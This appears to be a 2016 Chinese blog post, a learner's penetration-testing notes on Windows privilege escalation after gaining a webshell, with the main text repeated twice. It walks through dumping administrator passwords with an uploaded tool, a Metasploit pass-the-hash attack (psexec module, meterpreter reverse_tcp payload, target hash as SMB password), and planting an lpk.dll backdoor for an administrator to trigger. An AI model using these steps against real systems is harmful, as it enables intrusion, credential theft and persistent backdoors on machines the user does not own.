2016年4月11号渗透总结
2016-04-12 00:09
218 查看
今天又学了几个提权的方法。
1.getpass提权,去网上下载getpass工具,拿到网站的webshell后把这个工具上传上去,然后调用cmd来执行这个程序,管理员的账号和密码就会显示出来,很强大的一款工具,但是主机如果是安装的盗版系统,这个工具有时候就会失效。
2.hash传递入侵,这个入侵就需要用到有名的工具metasploit了,这个工具有windows和linux两个版本,可以去官网上下载。步骤如下:
启动msf msfconsole
use exploit/windows/smb/psexec 用到hash传递入侵的模块
show options 查看选项配置信息
3.set PAYLOAD windows/meterpreter/reverse_tcp 设置载荷 4.set LHOST 本机地址 5.set RHOST 目标地址 6.set SMBUser adminstriator 7.set SMBPass 目标机hash值 8exploit这里还需要用到一个获取目标及管理员hash值得工具,去网上下载,上传到目标主机中,用cmd运行就可以得到hash值,这样就ok了。
3.相当于钓鱼,需要管理员配合。条件:3389远程桌面开启 触发lpk后门触发条件:当前目录存在lpk.dll及exe程序,exe程序被运行,即触发后门通过工具生成lpk.dll再通过webshell上传到管理员常用的exe程序目录下,等待管理员触发执行。工具 tools lpk sethc 用这个工具需要先通过webshell上传一个开3389的程序,生成的文件名字必须叫lpk不能叫别的。触发后在通过远程桌面链接就可以了(这个方法我看了小迪的两套视频,他都没有试成功,我也试了几次也没有成功,真不知道是怎么回事。)
1.getpass提权,去网上下载getpass工具,拿到网站的webshell后把这个工具上传上去,然后调用cmd来执行这个程序,管理员的账号和密码就会显示出来,很强大的一款工具,但是主机如果是安装的盗版系统,这个工具有时候就会失效。
2.hash传递入侵,这个入侵就需要用到有名的工具metasploit了,这个工具有windows和linux两个版本,可以去官网上下载。步骤如下:
启动msf msfconsole
use exploit/windows/smb/psexec 用到hash传递入侵的模块
show options 查看选项配置信息
3.set PAYLOAD windows/meterpreter/reverse_tcp 设置载荷 4.set LHOST 本机地址 5.set RHOST 目标地址 6.set SMBUser adminstriator 7.set SMBPass 目标机hash值 8exploit这里还需要用到一个获取目标及管理员hash值得工具,去网上下载,上传到目标主机中,用cmd运行就可以得到hash值,这样就ok了。
3.相当于钓鱼,需要管理员配合。条件:3389远程桌面开启 触发lpk后门触发条件:当前目录存在lpk.dll及exe程序,exe程序被运行,即触发后门通过工具生成lpk.dll再通过webshell上传到管理员常用的exe程序目录下,等待管理员触发执行。工具 tools lpk sethc 用这个工具需要先通过webshell上传一个开3389的程序,生成的文件名字必须叫lpk不能叫别的。触发后在通过远程桌面链接就可以了(这个方法我看了小迪的两套视频,他都没有试成功,我也试了几次也没有成功,真不知道是怎么回事。)
相关文章推荐
- 总结一周内学习的Sql经验(一)
- PHP-MySQL教程归纳总结
- javascript中几个容易混淆的概念总结
- jquery学习总结(超级详细)
- JavaScript 对象深入学习总结(经典)
- ASP连接11种数据库语法总结
- 基于C++中常见编译错误的总结详解
- 基于JVM 调优的技巧总结分析
- 使用node.js半年来总结的 10 条经验
- Javascript基础知识(三)BOM,DOM总结
- PHP中最容易忘记的一些知识点总结
- PHP开发注意事项总结
- JAVASCRIPT keycode总结
- Java经典用法总结
- Java经典用法总结(二)
- 跟老齐学Python之数据类型总结
- 分享40个Java多线程问题小结
- [总结]视音频编解码技术零基础学习方法
- 芳仔的2015
- 个人随笔——衰人自叙卷贰